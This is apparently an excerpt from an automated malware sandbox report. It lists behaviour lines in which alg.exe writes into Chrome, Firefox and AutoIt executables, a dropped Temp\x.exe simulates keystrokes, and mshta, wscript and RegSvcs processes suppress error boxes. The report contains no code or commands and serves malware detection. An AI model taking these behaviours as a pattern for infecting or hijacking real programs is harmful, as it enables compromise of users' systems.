                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 166400Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739916Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 21924Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 185856Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 759372Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 759296Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 25840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 1624576Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 2198092Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 2198016Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 89651Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_004048D7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00485376
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00423187
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
